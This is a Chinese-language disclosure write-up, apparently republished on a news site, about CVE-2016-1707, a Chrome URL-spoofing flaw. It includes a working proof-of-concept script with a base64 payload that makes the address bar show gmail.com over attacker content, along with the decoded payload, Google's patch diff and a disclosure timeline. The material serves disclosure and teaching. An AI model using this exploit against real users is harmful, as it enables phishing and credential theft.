Chrome浏览器地址栏欺骗漏洞(CVE-2016-1707)

安全 漏洞
Chrome浏览器地址栏欺骗漏洞(CVE-2016-1707),这个漏洞笔者于2016年6月报告给Google,现在把漏洞细节分享给大家。URL Spoofing漏洞可以伪造一个合法的网站地址。攻击者可以利用这个漏洞对用户发起网络钓鱼攻击。

Chrome浏览器地址栏欺骗漏洞(CVE-2016-1707),这个漏洞笔者于2016年6月报告给Google,现在把漏洞细节分享给大家。URL Spoofing漏洞可以伪造一个合法的网站地址。攻击者可以利用这个漏洞对用户发起网络钓鱼攻击。

受影响版本:Chrome < v52.0.2743.82,IOS < v10

0x01 漏洞详情

  1. POC:  
  2. <script>  
  3. payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=" 
  4. function pwned() {  
  5. var t = window.open('https://www.gmail.com/''aaaa');  
  6. t.document.write(atob(payload));  
  7. t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");  
  8.  
  9. </script>  
  10. <a href="https://hack.com::/" target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br> 

那么这个漏洞是如何发生的呢?笔者现在来解读一下整个代码的加载过程。首先点击click me这个链接,浏览器去打开一个name为aaaa的新窗口,这个页面去加载“https://hack.com::”,这个地址可以随便写。500微秒后运行pwned(),在aaaa窗口打开https://www.gmail.com,当然这个URL可以为空。到现在为止,一切代码运行都很正常,接下来这段代码就是触发漏洞的核心代码。

base64加密的这段代码:

  1. base64 payload code:  
  2. <body></body>  
  3. <script>  
  4. var link = document.createElement('a');  
  5. link.href = 'https://gmail.com::' 
  6. document.body.appendChild(link);  
  7. link.click();  
  8. </script> 

接下来这段代开始在aaaa窗口页面去提交(commit)https://gmail.com::,这是一个很奇妙的事情,https://gmail.com::本是一个无效的地址,如何去被提交呢。在尝试了多种方法后,笔者发现使用a标签点击的方式可以做到(window.open/location则不可以),并且使这个无效地址处在了一个等待状态(pending status)。此时,实际Chrome是加载了about:blank(已经到了about:blank域),但在处理最后URL地址栏中的显示时,Chrome却选择了处在等待状态的https://gmail.com:: 作为最后的提交地址,加载后的https://gmail.com::在URL地址栏中会以https://gmail.com这样的方式呈现,两个::会被隐藏。此时,整个加载过程完成。一个完美的URL Spoofing漏洞就这样产生了。

Online demo:

http://xisigr.com/test/spoof/chrome/1.html

http://xisigr.com/test/spoof/chrome/2.html

如果你还没有升级版本,Chrome < v52.0.2743.82,IOS < v10,那么可以尝试运行笔者网站上的这两个DEMO。

0x02如何修复

这个漏洞最关键的地方是,Chrome允许在Web页面加载的时候,提交一个无效的地址所导致。Google也是基于此给出了补丁文件,就是在加载Web页面的时候不允许提交无效地址,如果检测到是无效地址,则直接使当前URL为about:blank。

  1. [self optOutScrollsToTopForSubviews];  
  2. // Ensure the URL is as expected (and already reported to the delegate).  
  3. - DCHECK(currentURL == _lastRegisteredRequestURL) //之前只是判断了当前URL和最后请求的URL是否相同  
  4. + // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be  
  5. + // "about:blank" 
  6. + DCHECK((currentURL == _lastRegisteredRequestURL) ||  
  7. + (!_lastRegisteredRequestURL.is_valid() && //增加判断是否是一个无效的URL  
  8. + _documentURL.spec() == [url::kAboutBlankURL)](url::kAboutBlankURL)))  
  9. << std::endl  
  10. << "currentURL = [" << currentURL << "]" << std::endl  
  11. << "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL << "]" 
  12. // This is the point where the document's URL has actually changed, and  
  13. // pending navigation information should be applied to state information.  
  14. [self setDocumentURL:net::GURLWithNSURL([_webView URL])];  
  15. - DCHECK(_documentURL == _lastRegisteredRequestURL);  
  16.  
  17. + if (!_lastRegisteredRequestURL.is_valid() &&  
  18. + _documentURL != _lastRegisteredRequestURL) {  
  19. + // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL|  
  20. + // will be "about:blank" 
  21. + [[self sessionController] updatePendingEntry:_documentURL];  
  22. + }  
  23. + DCHECK(_documentURL == _lastRegisteredRequestURL ||  
  24. + (!_lastRegisteredRequestURL.is_valid() &&  
  25. + _documentURL.spec() == url::kAboutBlankURL));  
  26.  
  27. self.webStateImpl->OnNavigationCommitted(_documentURL);  
  28. [self commitPendingNavigationInfo];  
  29. if ([self currentBackForwardListItemHolder]->navigation_type() == 

0x03 披露时间

2016/6/22 报送给Google,https://bugs.chromium.org/

2016/6/22 Google确认漏洞,漏洞级别High

2016/7/14 Google确认奖励$3000

2016/7/20 Google发布安全公告,CVE-2016-1707

2016/10/2 Google公开漏洞

责任编辑:武晓燕 来源: 红黑联盟
相关推荐

2015-12-01 10:43:55

2020-10-21 11:48:22

欺骗漏洞

2009-07-16 14:13:35

Swing地址栏

2011-05-20 17:23:41

Chrome 13

2011-11-04 15:28:49

傲游浏览器

2017-01-03 20:13:02

2021-05-27 20:46:22

浏览器地址栏谷歌

2023-01-27 11:01:54

谷歌Chrome浏览器

2020-10-26 09:56:40

恶意攻击手机浏览器地址栏欺骗

2010-08-26 17:54:16

微软

2012-08-05 17:13:47

傲游

2010-08-27 09:47:07

谷歌

2011-06-16 11:15:04

2013-11-27 15:38:14

IE浏览器故障

2011-02-21 14:10:50

Chrome

2023-02-02 16:35:36

微软Edge浏览器

2009-12-28 12:16:54

2009-12-16 10:04:51

Chrome浏览器漏洞

2021-05-27 15:06:41

Chrome浏览器Google

2020-12-09 09:32:03

漏洞黑客浏览器
点赞
收藏

51CTO技术栈公众号